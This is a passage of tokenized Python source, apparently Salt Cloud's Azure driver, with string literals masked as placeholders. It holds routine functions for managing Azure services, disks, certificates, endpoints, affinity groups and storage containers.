kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> data = conn . get_hosted_service_properties ( <EOL> kwargs [ '<STR_LIT:name>' ] , <EOL> kwargs . get ( '<STR_LIT>' , False ) <EOL> ) <EOL> ret = object_to_dict ( data ) <EOL> return ret <EOL> def create_service ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT:label>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT:location>' not in kwargs and '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> try : <EOL> data = conn . create_hosted_service ( <EOL> kwargs [ '<STR_LIT:name>' ] , <EOL> kwargs [ '<STR_LIT:label>' ] , <EOL> kwargs . get ( '<STR_LIT:description>' , None ) , <EOL> kwargs . get ( '<STR_LIT:location>' , None ) , <EOL> kwargs . get ( '<STR_LIT>' , None ) , <EOL> kwargs . 
get ( '<STR_LIT>' , None ) , <EOL> ) <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> except AzureConflictHttpError : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> def delete_service ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> try : <EOL> conn . delete_hosted_service ( kwargs [ '<STR_LIT:name>' ] ) <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> except AzureMissingResourceHttpError as exc : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' . format ( kwargs [ '<STR_LIT:name>' ] , exc . message ) ) <EOL> def list_disks ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> data = conn . list_disks ( ) <EOL> ret = { } <EOL> for item in data . disks : <EOL> ret [ item . name ] = object_to_dict ( item ) <EOL> return ret <EOL> def show_disk ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> data = conn . 
get_disk ( kwargs [ '<STR_LIT:name>' ] ) <EOL> return object_to_dict ( data ) <EOL> get_disk = show_disk <EOL> def cleanup_unattached_disks ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> disks = list_disks ( kwargs = kwargs , conn = conn , call = '<STR_LIT>' ) <EOL> for disk in disks : <EOL> if disks [ disk ] [ '<STR_LIT>' ] is None : <EOL> del_kwargs = { <EOL> '<STR_LIT:name>' : disks [ disk ] [ '<STR_LIT:name>' ] [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , False ) <EOL> } <EOL> log . info ( '<STR_LIT>' . format ( ** del_kwargs ) ) <EOL> data = delete_disk ( kwargs = del_kwargs , call = '<STR_LIT>' ) <EOL> return True <EOL> def delete_disk ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> try : <EOL> data = conn . delete_disk ( kwargs [ '<STR_LIT:name>' ] , kwargs . get ( '<STR_LIT>' , False ) ) <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> except AzureMissingResourceHttpError as exc : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' . format ( kwargs [ '<STR_LIT:name>' ] , exc . message ) ) <EOL> def update_disk ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> old_data = show_disk ( kwargs = { '<STR_LIT:name>' : kwargs [ '<STR_LIT:name>' ] } , call = '<STR_LIT>' ) <EOL> data = conn . 
update_disk ( <EOL> disk_name = kwargs [ '<STR_LIT:name>' ] , <EOL> has_operating_system = kwargs . get ( '<STR_LIT>' , old_data [ '<STR_LIT>' ] ) , <EOL> label = kwargs . get ( '<STR_LIT:label>' , old_data [ '<STR_LIT:label>' ] ) , <EOL> media_link = kwargs . get ( '<STR_LIT>' , old_data [ '<STR_LIT>' ] ) , <EOL> name = kwargs . get ( '<STR_LIT>' , old_data [ '<STR_LIT:name>' ] ) , <EOL> os = kwargs . get ( '<STR_LIT>' , old_data [ '<STR_LIT>' ] ) , <EOL> ) <EOL> return show_disk ( kwargs = { '<STR_LIT:name>' : kwargs [ '<STR_LIT:name>' ] } , call = '<STR_LIT>' ) <EOL> def list_service_certificates ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> data = conn . list_service_certificates ( service_name = kwargs [ '<STR_LIT:name>' ] ) <EOL> ret = { } <EOL> for item in data . certificates : <EOL> ret [ item . thumbprint ] = object_to_dict ( item ) <EOL> return ret <EOL> def show_service_certificate ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> data = conn . 
get_service_certificate ( <EOL> kwargs [ '<STR_LIT:name>' ] , <EOL> kwargs [ '<STR_LIT>' ] , <EOL> kwargs [ '<STR_LIT>' ] , <EOL> ) <EOL> return object_to_dict ( data ) <EOL> get_service_certificate = show_service_certificate <EOL> def add_service_certificate ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT:data>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT:password>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> try : <EOL> data = conn . add_service_certificate ( <EOL> kwargs [ '<STR_LIT:name>' ] , <EOL> kwargs [ '<STR_LIT:data>' ] , <EOL> kwargs [ '<STR_LIT>' ] , <EOL> kwargs [ '<STR_LIT:password>' ] , <EOL> ) <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> except AzureConflictHttpError : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def delete_service_certificate ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> try : <EOL> data = conn . 
delete_service_certificate ( <EOL> kwargs [ '<STR_LIT:name>' ] , <EOL> kwargs [ '<STR_LIT>' ] , <EOL> kwargs [ '<STR_LIT>' ] , <EOL> ) <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> except AzureMissingResourceHttpError as exc : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' . format ( kwargs [ '<STR_LIT:name>' ] , exc . message ) ) <EOL> def list_management_certificates ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> data = conn . list_management_certificates ( ) <EOL> ret = { } <EOL> for item in data . subscription_certificates : <EOL> ret [ item . subscription_certificate_thumbprint ] = object_to_dict ( item ) <EOL> return ret <EOL> def show_management_certificate ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> data = conn . get_management_certificate ( kwargs [ '<STR_LIT>' ] ) <EOL> return object_to_dict ( data ) <EOL> get_management_certificate = show_management_certificate <EOL> def add_management_certificate ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT:data>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> try : <EOL> conn . 
add_management_certificate ( <EOL> kwargs [ '<STR_LIT:name>' ] , <EOL> kwargs [ '<STR_LIT>' ] , <EOL> kwargs [ '<STR_LIT:data>' ] , <EOL> ) <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> except AzureConflictHttpError : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def delete_management_certificate ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> try : <EOL> conn . delete_management_certificate ( kwargs [ '<STR_LIT>' ] ) <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> except AzureMissingResourceHttpError as exc : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' . format ( kwargs [ '<STR_LIT>' ] , exc . message ) ) <EOL> def list_virtual_networks ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> path = '<STR_LIT>' <EOL> data = query ( path ) <EOL> return data <EOL> def list_input_endpoints ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> path = '<STR_LIT>' . format ( <EOL> kwargs [ '<STR_LIT>' ] , <EOL> kwargs [ '<STR_LIT>' ] , <EOL> ) <EOL> data = query ( path ) <EOL> if data is None : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' . 
format ( <EOL> kwargs [ '<STR_LIT>' ] , <EOL> kwargs [ '<STR_LIT>' ] <EOL> ) <EOL> ) <EOL> ret = { } <EOL> for item in data : <EOL> if '<STR_LIT>' not in item : <EOL> continue <EOL> input_endpoint = item [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> if not isinstance ( input_endpoint , list ) : <EOL> input_endpoint = [ input_endpoint ] <EOL> for endpoint in input_endpoint : <EOL> ret [ endpoint [ '<STR_LIT:Name>' ] ] = endpoint <EOL> return ret <EOL> def show_input_endpoint ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> data = list_input_endpoints ( kwargs = kwargs , call = '<STR_LIT>' ) <EOL> return data . get ( kwargs [ '<STR_LIT:name>' ] , None ) <EOL> get_input_endpoint = show_input_endpoint <EOL> def update_input_endpoint ( kwargs = None , conn = None , call = None , activity = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if activity != '<STR_LIT>' : <EOL> if '<STR_LIT:port>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> kwargs [ '<STR_LIT>' ] = kwargs [ '<STR_LIT:port>' ] <EOL> if '<STR_LIT>' not in kwargs : <EOL> kwargs [ '<STR_LIT>' ] = False <EOL> 
kwargs [ '<STR_LIT>' ] = str ( kwargs [ '<STR_LIT>' ] ) . lower ( ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> kwargs [ '<STR_LIT>' ] = <NUM_LIT:4> <EOL> old_endpoints = list_input_endpoints ( kwargs , call = '<STR_LIT>' ) <EOL> endpoints_xml = '<STR_LIT>' <EOL> endpoint_xml = '''<STR_LIT>''' <EOL> if activity == '<STR_LIT>' : <EOL> old_endpoints [ kwargs [ '<STR_LIT:name>' ] ] = kwargs <EOL> old_endpoints [ kwargs [ '<STR_LIT:name>' ] ] [ '<STR_LIT:Name>' ] = kwargs [ '<STR_LIT:name>' ] <EOL> for endpoint in old_endpoints : <EOL> if old_endpoints [ endpoint ] [ '<STR_LIT:Name>' ] == kwargs [ '<STR_LIT:name>' ] : <EOL> if activity != '<STR_LIT>' : <EOL> this_endpoint_xml = endpoint_xml . format ( ** kwargs ) <EOL> endpoints_xml += this_endpoint_xml <EOL> else : <EOL> this_endpoint_xml = endpoint_xml . format ( <EOL> local_port = old_endpoints [ endpoint ] [ '<STR_LIT>' ] , <EOL> name = old_endpoints [ endpoint ] [ '<STR_LIT:Name>' ] , <EOL> port = old_endpoints [ endpoint ] [ '<STR_LIT>' ] , <EOL> protocol = old_endpoints [ endpoint ] [ '<STR_LIT>' ] , <EOL> enable_direct_server_return = old_endpoints [ endpoint ] [ '<STR_LIT>' ] , <EOL> timeout_for_tcp_idle_connection = old_endpoints [ endpoint ] . get ( '<STR_LIT>' , <NUM_LIT:4> ) , <EOL> ) <EOL> endpoints_xml += this_endpoint_xml <EOL> request_xml = '''<STR_LIT>''' . format ( endpoints_xml ) <EOL> path = '<STR_LIT>' . 
format ( <EOL> kwargs [ '<STR_LIT>' ] , <EOL> kwargs [ '<STR_LIT>' ] , <EOL> kwargs [ '<STR_LIT>' ] , <EOL> ) <EOL> query ( <EOL> path = path , <EOL> method = '<STR_LIT>' , <EOL> header_dict = { '<STR_LIT:Content-Type>' : '<STR_LIT>' } , <EOL> data = request_xml , <EOL> decode = False , <EOL> ) <EOL> return True <EOL> def add_input_endpoint ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> return update_input_endpoint ( <EOL> kwargs = kwargs , <EOL> conn = conn , <EOL> call = '<STR_LIT>' , <EOL> activity = '<STR_LIT>' , <EOL> ) <EOL> def delete_input_endpoint ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> return update_input_endpoint ( <EOL> kwargs = kwargs , <EOL> conn = conn , <EOL> call = '<STR_LIT>' , <EOL> activity = '<STR_LIT>' , <EOL> ) <EOL> def show_deployment ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> data = conn . get_deployment_by_name ( <EOL> service_name = kwargs [ '<STR_LIT>' ] , <EOL> deployment_name = kwargs [ '<STR_LIT>' ] , <EOL> ) <EOL> return object_to_dict ( data ) <EOL> get_deployment = show_deployment <EOL> def list_affinity_groups ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> data = conn . list_affinity_groups ( ) <EOL> ret = { } <EOL> for item in data . affinity_groups : <EOL> ret [ item . 
name ] = object_to_dict ( item ) <EOL> return ret <EOL> def show_affinity_group ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> data = conn . get_affinity_group_properties ( affinity_group_name = kwargs [ '<STR_LIT:name>' ] ) <EOL> return object_to_dict ( data ) <EOL> get_affinity_group = show_affinity_group <EOL> def create_affinity_group ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT:label>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT:location>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> try : <EOL> conn . create_affinity_group ( <EOL> kwargs [ '<STR_LIT:name>' ] , <EOL> kwargs [ '<STR_LIT:label>' ] , <EOL> kwargs [ '<STR_LIT:location>' ] , <EOL> kwargs . 
get ( '<STR_LIT:description>' , None ) , <EOL> ) <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> except AzureConflictHttpError : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> def update_affinity_group ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT:label>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> conn . update_affinity_group ( <EOL> affinity_group_name = kwargs [ '<STR_LIT:name>' ] , <EOL> label = kwargs [ '<STR_LIT:label>' ] , <EOL> description = kwargs . get ( '<STR_LIT:description>' , None ) , <EOL> ) <EOL> return show_affinity_group ( kwargs = { '<STR_LIT:name>' : kwargs [ '<STR_LIT:name>' ] } , call = '<STR_LIT>' ) <EOL> def delete_affinity_group ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> try : <EOL> conn . delete_affinity_group ( kwargs [ '<STR_LIT:name>' ] ) <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> except AzureMissingResourceHttpError as exc : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' . format ( kwargs [ '<STR_LIT:name>' ] , exc . message ) ) <EOL> def get_storage_conn ( storage_account = None , storage_key = None , conn_kwargs = None ) : <EOL> '''<STR_LIT>''' <EOL> if conn_kwargs is None : <EOL> conn_kwargs = { } <EOL> if not storage_account : <EOL> storage_account = config . 
get_cloud_config_value ( <EOL> '<STR_LIT>' , <EOL> get_configured_provider ( ) , __opts__ , search_global = False , <EOL> default = conn_kwargs . get ( '<STR_LIT>' , None ) <EOL> ) <EOL> if not storage_key : <EOL> storage_key = config . get_cloud_config_value ( <EOL> '<STR_LIT>' , <EOL> get_configured_provider ( ) , __opts__ , search_global = False , <EOL> default = conn_kwargs . get ( '<STR_LIT>' , None ) <EOL> ) <EOL> return azure . storage . BlobService ( storage_account , storage_key ) <EOL> def make_blob_url ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> data = storage_conn . make_blob_url ( <EOL> kwargs [ '<STR_LIT>' ] , <EOL> kwargs [ '<STR_LIT>' ] , <EOL> kwargs . get ( '<STR_LIT>' , None ) , <EOL> kwargs . get ( '<STR_LIT>' , None ) , <EOL> kwargs . get ( '<STR_LIT>' , None ) , <EOL> ) <EOL> ret = { } <EOL> for item in data . containers : <EOL> ret [ item . name ] = object_to_dict ( item ) <EOL> return ret <EOL> def list_storage_containers ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> data = storage_conn . list_containers ( ) <EOL> ret = { } <EOL> for item in data . containers : <EOL> ret [ item . 
name ] = object_to_dict ( item ) <EOL> return ret <EOL> def create_storage_container ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> try : <EOL> storage_conn . create_container ( <EOL> container_name = kwargs [ '<STR_LIT:name>' ] , <EOL> x_ms_meta_name_values = kwargs . get ( '<STR_LIT>' , None ) , <EOL> x_ms_blob_public_access = kwargs . get ( '<STR_LIT>' , None ) , <EOL> fail_on_exist = kwargs . get ( '<STR_LIT>' , False ) , <EOL> ) <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> except AzureConflictHttpError : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> def show_storage_container ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> data = storage_conn . get_container_properties ( <EOL> container_name = kwargs [ '<STR_LIT:name>' ] , <EOL> x_ms_lease_id = kwargs . get ( '<STR_LIT>' , None ) , <EOL> ) <EOL> return data <EOL> get_storage_container = show_storage_container <EOL> def show_storage_container_metadata ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> data = storage_conn . 
get_container_metadata ( <EOL> container_name = kwargs [ '<STR_LIT:name>' ] , <EOL> x_ms_lease_id = kwargs . get ( '<STR_LIT>' , None ) , <EOL> ) <EOL> return data <EOL> get_storage_container_metadata = show_storage_container_metadata <EOL> def set_storage_container_metadata ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> x_ms_meta_name_values = yaml . safe_load ( <EOL> kwargs . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> try : <EOL> storage_conn . set_container_metadata ( <EOL> container_name = kwargs [ '<STR_LIT:name>' ] , <EOL> x_ms_meta_name_values = x_ms_meta_name_values , <EOL> x_ms_lease_id = kwargs . get ( '<STR_LIT>' , None ) , <EOL> ) <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> except AzureConflictHttpError : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> def show_storage_container_acl ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> data = storage_conn . get_container_acl ( <EOL> 